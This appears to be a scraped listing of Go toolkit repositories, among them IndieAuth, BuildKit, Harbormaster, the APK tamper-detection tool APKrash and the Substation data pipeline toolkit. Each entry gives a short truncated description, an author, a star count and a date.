Moby 5.7k Sep 18, 2022
IndieAuth Toolkit for Go.

IndieAuth Toolkit for Go This repository contains a set of tools to help you implement IndieAuth, both server and client, in Go. The documentation can

Henrique Dias 18 Sep 4, 2022
JOY5 AV Toolkit.

JOY5 AV Toolkit.

null 333 Sep 13, 2022
BuildKit - A toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner

BuildKit BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Key features: Automati

CrazyMax 5 Feb 19, 2022
Harbormaster - Toolkit for automating the creation & mgmt of Docker components and tools

My development environment is MacOS with an M1 chip and I mostly develop for lin

Gabe Susman 0 Feb 17, 2022
APKrash is an Android APK security analysis toolkit focused on comparing APKs to detect tampering and repackaging.

APKrash APKrash is an Android APK security analysis toolkit focused on comparing APKs to detect tampering and repackaging. Features Able to analyze pu

Henrique Goncalves 11 Jul 1, 2022
Substation is a cloud native toolkit for building modular ingest, transform, and load (ITL) data pipelines

Substation Substation is a cloud native data pipeline toolkit. What is Substation? Substation is a modular ingest, transform, load (ITL) application f

Brex 20 Sep 14, 2022